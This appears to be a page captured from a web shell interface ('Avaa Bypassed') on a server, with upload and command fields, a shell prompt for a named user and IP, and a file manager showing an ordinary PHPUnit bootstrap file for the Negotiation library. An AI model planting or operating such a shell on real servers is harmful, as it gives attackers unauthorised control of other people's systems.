[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.227.111.58: ~ $
<?php

if (! ($loader = @include __DIR__ . '/../vendor/autoload.php')) {
    die(<<<EOT
You need to install the project dependencies using Composer:
$ wget http://getcomposer.org/composer.phar
OR
$ curl -s https://getcomposer.org/installer | php
$ php composer.phar install --dev
$ phpunit
EOT
    );
}

$loader->add('Negotiation\Tests', __DIR__);

Filemanager

Name Type Size Permission Actions
Negotiation Folder 0755
bootstrap.php File 348 B 0644